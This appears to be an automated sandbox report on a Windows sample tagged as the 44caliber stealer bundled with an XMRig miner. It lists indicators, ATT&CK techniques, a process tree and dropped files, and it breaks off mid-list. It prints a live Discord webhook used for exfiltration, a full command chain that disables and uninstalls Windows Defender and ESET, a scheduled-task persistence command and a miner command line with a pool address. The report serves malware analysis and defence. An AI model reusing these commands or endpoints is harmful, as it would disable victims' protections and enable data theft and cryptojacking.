44caliber | e0166af88734a1ad71aa1dc6e18fbd4db40d5ab2177547d0091aa6202efc3c4a

Analysis

max time kernel
2s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
27-01-2024 12:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7a4520a5b7cb55ca8a4137be525703ca.exe
Size

9.5MB
MD5

7a4520a5b7cb55ca8a4137be525703ca
SHA1

307f0281d899630f6d2e7988a6570192a24b092e
SHA256

e0166af88734a1ad71aa1dc6e18fbd4db40d5ab2177547d0091aa6202efc3c4a
SHA512

e98d2a34f046f8eb4898cc6bb0820ab6655e862a31a9b4696e712994dc39d84a01af879ecedd640c0c333557b2f6639fc9dfc1930fab4f7a6a23c11641249813
SSDEEP

196608:WFSJAB+ZcpS+S6SrGTsD2dmmhGlkrwPgZS7rjsn6P44Nm0:WFS+Bkc0+Fe6dmracMR70

Score

10^/10

44caliber xmrig discovery evasion miner stealer

Malware Config

Extracted

Family

44caliber

https://discord.com/api/webhooks/868513655556292688/7ViWQKXofSCTi8VWoHEcGeQK61RUEBYfnsE72cu6TJnpHYwlgzbrVI5gQn_jpfUMFoS5

Signatures

44Caliber
An open source infostealer written in C#.
stealer 44caliber
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 10 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/856-1939-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/856-1941-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/856-1938-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/856-2057-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/856-2058-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/856-2059-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/856-2062-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/856-2063-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/856-2065-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/856-2064-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

7a4520a5b7cb55ca8a4137be525703ca.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	7a4520a5b7cb55ca8a4137be525703ca.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

3608 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

51 pastebin.com
54 raw.githubusercontent.com
55 raw.githubusercontent.com
50 pastebin.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

8 freegeoip.app
9 freegeoip.app
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4212 sc.exe
2012 sc.exe
4012 sc.exe
3824 sc.exe
4812 sc.exe
2288 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1392 schtasks.exe
1556 schtasks.exe

pid	process
3608	icacls.exe

flow	ioc
51	pastebin.com
54	raw.githubusercontent.com
55	raw.githubusercontent.com
50	pastebin.com

flow	ioc
8	freegeoip.app
9	freegeoip.app

pid	process
4212	sc.exe
2012	sc.exe
4012	sc.exe
3824	sc.exe
4812	sc.exe
2288	sc.exe

pid	process
1392	schtasks.exe
1556	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\7a4520a5b7cb55ca8a4137be525703ca.exe
"C:\Users\Admin\AppData\Local\Temp\7a4520a5b7cb55ca8a4137be525703ca.exe"
1⤵
- Checks computer location settings
PID:1560

C:\Users\Admin\AppData\Local\Temp\InterialoaderNOP.exe
"C:\Users\Admin\AppData\Local\Temp\InterialoaderNOP.exe"
2⤵
PID:2360

C:\Users\Admin\AppData\Local\Temp\Interialoader.exe
"C:\Users\Admin\AppData\Local\Temp\Interialoader.exe"
3⤵
PID:1112

C:\Users\Admin\AppData\Local\Temp\Interia loader.exe
"C:\Users\Admin\AppData\Local\Temp\Interia loader.exe"
4⤵
PID:4008

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
5⤵
PID:1856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
6⤵
PID:2376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
6⤵
PID:4572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
6⤵
PID:1608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
6⤵
PID:1316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableArchiveScanning $true
6⤵
PID:4904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
6⤵
PID:2992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
6⤵
PID:1628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableScriptScanning $true
6⤵
PID:4540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
6⤵
PID:336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIOAVProtection $true
6⤵
PID:1984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
6⤵
PID:3408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
6⤵
PID:2784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -MAPSReporting Disabled
6⤵
PID:3868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
6⤵
PID:4852

C:\Windows\system32\sc.exe
sc stop WinDefend
6⤵
- Launches sc.exe
PID:4212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Stop-Service WinDefend
6⤵
PID:4284

C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
6⤵
- Launches sc.exe
PID:2012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-Service WinDefend -StartupType Disabled
6⤵
PID:3876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
6⤵
PID:1896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
6⤵
PID:3028

C:\Windows\system32\Dism.exe
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
6⤵
PID:3508

C:\Users\Admin\AppData\Local\Temp\32EE1767-D786-44B3-9B82-240DE2B33F77\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\32EE1767-D786-44B3-9B82-240DE2B33F77\dismhost.exe {198A4197-03A9-40BA-BBFA-A5BF806A2193}
7⤵
PID:3504

C:\Windows\System32\Wbem\WMIC.exe
Wmic Product where name="Eset Security" call uninstall
6⤵
PID:2820

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit
5⤵
PID:3888

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'
6⤵
- Creates scheduled task(s)
PID:1392

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
5⤵
PID:4212

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
6⤵
PID:4992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
7⤵
PID:3192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
7⤵
PID:3812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
7⤵
PID:2360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
7⤵
PID:4804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableArchiveScanning $true
7⤵
PID:4828

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
7⤵
PID:1768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
7⤵
PID:3628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableScriptScanning $true
7⤵
PID:1748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
7⤵
PID:1848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIOAVProtection $true
7⤵
PID:1420

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'
8⤵
- Creates scheduled task(s)
PID:1556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
7⤵
PID:3872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
7⤵
PID:4780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -MAPSReporting Disabled
7⤵
PID:4796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
7⤵
PID:784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Stop-Service WinDefend
7⤵
PID:2196

C:\Windows\system32\sc.exe
sc stop WinDefend
7⤵
- Launches sc.exe
PID:4012

C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
7⤵
- Launches sc.exe
PID:3824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-Service WinDefend -StartupType Disabled
7⤵
PID:1428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
7⤵
PID:4428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
7⤵
PID:4432

C:\Windows\system32\Dism.exe
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
7⤵
PID:4976

C:\Users\Admin\AppData\Local\Temp\CAA8A113-17BD-4FFD-8EBC-62142DF38910\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\CAA8A113-17BD-4FFD-8EBC-62142DF38910\dismhost.exe {B3A100A1-AFBF-401D-B3CA-61089B23B3B9}
8⤵
PID:684

C:\Windows\System32\Wbem\WMIC.exe
Wmic Product where name="Eset Security" call uninstall
7⤵
PID:4408

C:\Users\Admin\AppData\Roaming\Services.exe
"C:\Users\Admin\AppData\Roaming\Services.exe"
5⤵
PID:4392

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
6⤵
PID:1568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
7⤵
PID:456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
7⤵
PID:3248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
7⤵
PID:2656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
7⤵
PID:228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableArchiveScanning $true
7⤵
PID:1392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
7⤵
PID:1772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
7⤵
PID:3348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableScriptScanning $true
7⤵
PID:4636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
7⤵
PID:4416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIOAVProtection $true
7⤵
PID:4200

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
7⤵
PID:4676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
7⤵
PID:4552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -MAPSReporting Disabled
7⤵
PID:2128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
7⤵
PID:2320

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Stop-Service WinDefend
7⤵
PID:2580

C:\Windows\system32\sc.exe
sc stop WinDefend
7⤵
- Launches sc.exe
PID:4812

C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
7⤵
- Launches sc.exe
PID:2288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-Service WinDefend -StartupType Disabled
7⤵
PID:2940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
7⤵
PID:456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
7⤵
PID:5108

C:\Windows\system32\Dism.exe
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
7⤵
PID:220

C:\Users\Admin\AppData\Local\Temp\E613A283-B5DE-4ED9-95E6-B611EB20E4AA\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\E613A283-B5DE-4ED9-95E6-B611EB20E4AA\dismhost.exe {DC6562B9-7152-409B-927D-07F95B13672A}
8⤵
PID:5008

C:\Windows\System32\Wbem\WMIC.exe
Wmic Product where name="Eset Security" call uninstall
7⤵
PID:3680

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit
6⤵
PID:1420

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
6⤵
PID:4012

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
7⤵
PID:3396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
8⤵
PID:4548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
8⤵
PID:3468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
8⤵
PID:4524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
8⤵
PID:4800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableArchiveScanning $true
8⤵
PID:4564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
8⤵
PID:5108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
8⤵
PID:3652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableScriptScanning $true
8⤵
PID:4672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
8⤵
PID:3552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-MpPreference -DisableIOAVProtection $true
8⤵
PID:4492

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6056254 --pass=in --cpu-max-threads-hint=40 --donate-level=5 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth
6⤵
PID:856

C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
4⤵
PID:4656

C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe
"C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe"
3⤵
PID:4212

C:\Users\Admin\AppData\Local\Temp\Config.exe
"C:\Users\Admin\AppData\Local\Temp\Config.exe"
2⤵
PID:2308

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe" org.develnext.jphp.ext.javafx.FXLauncher
1⤵
PID:800

C:\Windows\system32\icacls.exe
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
2⤵
- Modifies file permissions
PID:3608

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:2932

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

File and Directory Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\44\Process.txt
Filesize
1KB

MD5
c0728ca9667ddfd4f5cb07c73ffc39e2

SHA1
8270b21d9ff7365adc5c3e8631c6036c895b9a15

SHA256
fa3263b205e94fa4e22a4a39ed8f78aee08e7b982f97622b6dee0cb91655bb0f

SHA512
ff61d80dc809520c752fb876533b12999fb5d462bb14d24949bd47c0fd78873204fa58081782428fe841b45956ea5b92ce4e0ba2bc44133b6f62d1552176e20a

Download Submit
C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp
Filesize
46B

MD5
4be0fc81272cbe1570a3846e60910fc2

SHA1
31b87f768f84dc2ae10fce04d026a282cf0a9b03

SHA256
a948e4af5c62a1d7be6f07e2e537470154f0a70d2d4a85515cba5e0189851375

SHA512
6db49ef99cd2ef8009d4eb5e1836df35cc3cd187f3abb4f2b0cc03c84d088fc83daf02b14d5fecb3d889797869bdccf1d4d8371c3685b8ad4decb1b9acd0d40f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d8cb3e9459807e35f02130fad3f9860d

SHA1
5af7f32cb8a30e850892b15e9164030a041f4bd6

SHA256
2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

SHA512
045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
e3161f4edbc9b963debe22e29658050b

SHA1
45dbf88dadafe5dd1cfee1e987c8a219d3208cdb

SHA256
1359d6daeaed2f254b162914203c891b23139cc236a3bf75c2dfcbe26265c84a

SHA512
006ffb8f37d1f77f8ee79b22ffa413819f565d62773c632b70985759572121c6ab4743139d16d885f8c0ff9d0e0b136686741728b3e142ee54aea3bb733dffb2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
ba169f4dcbbf147fe78ef0061a95e83b

SHA1
92a571a6eef49fff666e0f62a3545bcd1cdcda67

SHA256
5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

SHA512
8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
98baf5117c4fcec1692067d200c58ab3

SHA1
5b33a57b72141e7508b615e17fb621612cb8e390

SHA256
30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51

SHA512
344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
5cfe303e798d1cc6c1dab341e7265c15

SHA1
cd2834e05191a24e28a100f3f8114d5a7708dc7c

SHA256
